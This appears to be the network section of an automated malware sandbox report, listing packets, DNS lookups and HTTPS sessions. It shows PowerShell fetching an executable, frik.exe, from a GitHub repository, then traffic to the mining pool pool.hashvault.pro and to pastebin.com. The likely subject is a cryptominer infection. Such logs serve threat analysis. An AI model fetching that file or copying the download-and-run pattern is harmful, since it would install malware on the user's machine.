Oct 8, 2024 14:02:27.678457975 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.678515911 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.678515911 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.678523064 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.678937912 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.678980112 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.678998947 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.679028034 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.679061890 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.716121912 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.716155052 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.716216087 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.716247082 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.716317892 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.759773970 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.761323929 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.761343002 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.761378050 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.761490107 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.761498928 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.761517048 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.761554956 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.762464046 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.762480021 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.762581110 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.762587070 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.762618065 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.762629032 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.762638092 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.762669086 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.762728930 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.762728930 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.762734890 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.762964010 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.763784885 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.763825893 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.763895035 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.763895035 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.763901949 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.763942003 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.764251947 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.764308929 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.764357090 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.764362097 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.764375925 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.764420986 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.765467882 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.765520096 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.765567064 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.765573025 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.765588045 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.765611887 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.765646935 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.765691996 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.765757084 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.765757084 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.765763044 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.765887022 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.803157091 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.803205967 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.803284883 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.803302050 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.803355932 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.803356886 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.848226070 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.848279953 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.848474979 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.848474979 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.848490000 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.848691940 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.849241018 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.849284887 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.849323988 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.849329948 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.849342108 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.849407911 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.849721909 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.849761009 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.849816084 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.849821091 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.849834919 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.850073099 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.850585938 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.850630045 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.850673914 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.850680113 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.850718021 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.850718021 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.851435900 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.851476908 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.851536989 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.851536989 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.851541996 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.851573944 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.852400064 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.852441072 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.852511883 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.852511883 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.852521896 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.852587938 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.852720976 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.852761984 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.852807045 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.852813959 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.852859020 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.852910042 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.890923977 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.890959978 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.891114950 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.891134977 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.891257048 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.935720921 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.935785055 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.935899019 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.935899019 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.935909986 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.936022043 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.936341047 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.936391115 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.936484098 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.936490059 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.936528921 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.936579943 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.936621904 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.936667919 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.936734915 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.936734915 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.936742067 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.936806917 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.937489033 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.937532902 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.937588930 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.937588930 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.937597036 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.937634945 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.938267946 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.938324928 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.938358068 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.938364029 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.938397884 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.938397884 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.939377069 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.939448118 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.939505100 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.939505100 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.939511061 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.939575911 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.939645052 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.939686060 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.939721107 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.939726114 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.939764023 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.939773083 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.978030920 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.978066921 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.978204966 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.978214025 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:27.978230953 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:27.978301048 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.023276091 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.023322105 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.023490906 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.023504019 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.023566008 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.023964882 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.023993015 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.024051905 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.024060965 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.024066925 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.024097919 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.024122000 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.024131060 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.024177074 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.024177074 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.025006056 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.025027037 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.025089025 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.025100946 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.025257111 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.025708914 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.025729895 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.025774002 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.025779009 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.025813103 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.025868893 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.026041031 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.026076078 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.026133060 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.026133060 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.026140928 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.026397943 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:28.026448011 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:28.026562929 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:44.790483952 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:02:44.790529013 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:02:44.790606976 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:02:44.791043997 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:02:44.791055918 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:02:45.453068972 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:02:45.454724073 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:02:45.454742908 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:02:45.456188917 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:02:45.456296921 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:02:45.457878113 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:02:45.458003044 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:02:45.663412094 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:02:45.663467884 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:02:45.768086910 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:02:45.777343988 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:45.777375937 CEST	443	49714	104.20.4.235	192.168.2.9
Oct 8, 2024 14:02:45.777621031 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:45.790544033 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:45.790570974 CEST	443	49714	104.20.4.235	192.168.2.9
Oct 8, 2024 14:02:45.910706997 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:02:46.337071896 CEST	443	49714	104.20.4.235	192.168.2.9
Oct 8, 2024 14:02:46.338460922 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:46.338475943 CEST	443	49714	104.20.4.235	192.168.2.9
Oct 8, 2024 14:02:46.340024948 CEST	443	49714	104.20.4.235	192.168.2.9
Oct 8, 2024 14:02:46.340095043 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:46.342056990 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:46.342132092 CEST	443	49714	104.20.4.235	192.168.2.9
Oct 8, 2024 14:02:46.342252016 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:46.342264891 CEST	443	49714	104.20.4.235	192.168.2.9
Oct 8, 2024 14:02:46.384476900 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:51.337795019 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:51.337896109 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:51.338047028 CEST	443	49714	104.20.4.235	192.168.2.9
Oct 8, 2024 14:02:51.338083982 CEST	443	49714	104.20.4.235	192.168.2.9
Oct 8, 2024 14:02:51.338108063 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:02:51.338141918 CEST	49714	443	192.168.2.9	104.20.4.235
Oct 8, 2024 14:03:01.115612984 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:03:01.259497881 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:03:06.127993107 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:03:06.259459972 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:03:28.171418905 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:03:28.306395054 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:03:50.133577108 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:03:50.314114094 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:03:59.678313971 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:03:59.723400116 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:03:59.999234915 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:04:00.118787050 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:04:01.110482931 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:04:01.306283951 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:04:11.998188019 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:04:12.118804932 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:04:14.814305067 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:04:14.915697098 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:04:36.164362907 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:04:36.321882963 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:04:58.391836882 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:04:58.529872894 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:05:21.033510923 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:05:21.118674040 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:05:41.991370916 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:05:42.118622065 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:06:03.985447884 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:06:04.118819952 CEST	49713	443	192.168.2.9	95.179.241.203
Oct 8, 2024 14:06:26.147094011 CEST	443	49713	95.179.241.203	192.168.2.9
Oct 8, 2024 14:06:26.212316990 CEST	49713	443	192.168.2.9	95.179.241.203

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 14:02:22.382484913 CEST	56562	53	192.168.2.9	1.1.1.1
Oct 8, 2024 14:02:22.389697075 CEST	53	56562	1.1.1.1	192.168.2.9
Oct 8, 2024 14:02:23.582901955 CEST	62896	53	192.168.2.9	1.1.1.1
Oct 8, 2024 14:02:23.590401888 CEST	53	62896	1.1.1.1	192.168.2.9
Oct 8, 2024 14:02:44.743380070 CEST	60174	53	192.168.2.9	1.1.1.1
Oct 8, 2024 14:02:44.787023067 CEST	53	60174	1.1.1.1	192.168.2.9
Oct 8, 2024 14:02:45.769243956 CEST	56026	53	192.168.2.9	1.1.1.1
Oct 8, 2024 14:02:45.776557922 CEST	53	56026	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 14:02:22.382484913 CEST	192.168.2.9	1.1.1.1	0x5f10	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:23.582901955 CEST	192.168.2.9	1.1.1.1	0x92a4	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:44.743380070 CEST	192.168.2.9	1.1.1.1	0x8feb	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:45.769243956 CEST	192.168.2.9	1.1.1.1	0x141d	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 14:02:22.389697075 CEST	1.1.1.1	192.168.2.9	0x5f10	No error (0)	github.com	140.82.121.4	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:23.590401888 CEST	1.1.1.1	192.168.2.9	0x92a4	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:23.590401888 CEST	1.1.1.1	192.168.2.9	0x92a4	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:23.590401888 CEST	1.1.1.1	192.168.2.9	0x92a4	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:23.590401888 CEST	1.1.1.1	192.168.2.9	0x92a4	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:44.787023067 CEST	1.1.1.1	192.168.2.9	0x8feb	No error (0)	pool.hashvault.pro	95.179.241.203	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:44.787023067 CEST	1.1.1.1	192.168.2.9	0x8feb	No error (0)	pool.hashvault.pro	45.76.89.70	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:45.776557922 CEST	1.1.1.1	192.168.2.9	0x141d	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:45.776557922 CEST	1.1.1.1	192.168.2.9	0x141d	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Oct 8, 2024 14:02:45.776557922 CEST	1.1.1.1	192.168.2.9	0x141d	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

raw.githubusercontent.com

pastebin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49706	140.82.121.4	443	4872	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 12:02:23 UTC	104	OUT	GET /fruktoozik/qnfr/raw/refs/heads/main/frik.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-10-08 12:02:23 UTC	555	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Tue, 08 Oct 2024 12:02:23 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: Location: https://raw.githubusercontent.com/fruktoozik/qnfr/refs/heads/main/frik.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-10-08 12:02:23 UTC	3390	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
2024-10-08 12:02:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49707	185.199.109.133	443	4872	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 12:02:24 UTC	115	OUT	GET /fruktoozik/qnfr/refs/heads/main/frik.exe HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
